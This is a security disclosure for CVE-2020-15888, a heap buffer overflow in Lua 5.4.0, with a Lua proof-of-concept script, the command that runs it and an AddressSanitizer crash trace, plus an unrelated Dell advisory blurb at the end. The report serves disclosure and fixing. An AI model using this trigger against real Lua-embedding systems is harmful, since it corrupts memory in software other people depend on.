Headline
CVE-2020-15888: Heap overflow in luaT_adjustvarargs
Lua through 5.4.0 mishandles the interaction between stack resizes and garbage collection, leading to a heap-based buffer overflow, heap-based buffer over-read, or use-after-free.
Hi,
We found a heap overflow in lua. Here’s the details:
Version:
Lua 5.4.0, git hash c33b1728aeb7dfeec4013562660e07d32697aa6b
POC:
do
function errfunc(p16, p17, p18, p19, p20, p21, p22, p23, p24, p25, p26, p27,
p28, p29, p30, p31, p32, p33, p34, p35, p36, p37, p38, p39,
p40, p41, p42, p43, p44, p45, p46, p48, p49, p50, ...) a9
'fail' end coroutine.wrap(function() xpcall(
test,
function() do setmetatable({},
{ \_\_gc = function() if k < 2 then end end })
end end) xpcall(test, errfunc) end)() end
How to reproduce:
./lua poc.lua
Stack dump:
=================================================================
==12863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d000001370 at pc 0x000000434ef4 bp 0x7ffeca5e4290 sp 0x7ffeca5e4280
WRITE of size 8 at 0x61d000001370 thread T0
#0 0x434ef3 in luaT\_adjustvarargs (/home/yongheng/lua\_asan/lua+0x434ef3)
#1 0x43a6fa in luaV\_execute (/home/yongheng/lua\_asan/lua+0x43a6fa)
#2 0x415194 in luaD\_callnoyield (/home/yongheng/lua\_asan/lua+0x415194)
#3 0x4112ae in luaG\_errormsg (/home/yongheng/lua\_asan/lua+0x4112ae)
#4 0x411491 in luaG\_runerror (/home/yongheng/lua\_asan/lua+0x411491)
#5 0x411595 in luaG\_typeerror (/home/yongheng/lua\_asan/lua+0x411595)
#6 0x4138bc in luaD\_tryfuncTM (/home/yongheng/lua\_asan/lua+0x4138bc)
#7 0x41480d in luaD\_call (/home/yongheng/lua\_asan/lua+0x41480d)
#8 0x43d4cc in luaV\_execute (/home/yongheng/lua\_asan/lua+0x43d4cc)
#9 0x415194 in luaD\_callnoyield (/home/yongheng/lua\_asan/lua+0x415194)
#10 0x4112ae in luaG\_errormsg (/home/yongheng/lua\_asan/lua+0x4112ae)
#11 0x411491 in luaG\_runerror (/home/yongheng/lua\_asan/lua+0x411491)
#12 0x411595 in luaG\_typeerror (/home/yongheng/lua\_asan/lua+0x411595)
#13 0x4138bc in luaD\_tryfuncTM (/home/yongheng/lua\_asan/lua+0x4138bc)
#14 0x41480d in luaD\_call (/home/yongheng/lua\_asan/lua+0x41480d)
#15 0x40bfb3 in lua\_pcallk (/home/yongheng/lua\_asan/lua+0x40bfb3)
#16 0x45672e in luaB\_xpcall (/home/yongheng/lua\_asan/lua+0x45672e)
#17 0x414de1 in luaD\_call (/home/yongheng/lua\_asan/lua+0x414de1)
#18 0x43d4cc in luaV\_execute (/home/yongheng/lua\_asan/lua+0x43d4cc)
#19 0x4142f2 in unroll (/home/yongheng/lua\_asan/lua+0x4142f2)
#20 0x4127d0 in luaD\_rawrunprotected (/home/yongheng/lua\_asan/lua+0x4127d0)
#21 0x4157f2 in lua\_resume (/home/yongheng/lua\_asan/lua+0x4157f2)
#22 0x469fa4 in auxresume (/home/yongheng/lua\_asan/lua+0x469fa4)
#23 0x46a4da in luaB\_auxwrap (/home/yongheng/lua\_asan/lua+0x46a4da)
#24 0x414de1 in luaD_call (/home/yongheng/lua_asan/lua+0x414de1)
Found by: Yongheng Chen and Rui Zhong
Best,
Yongheng
Related news
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.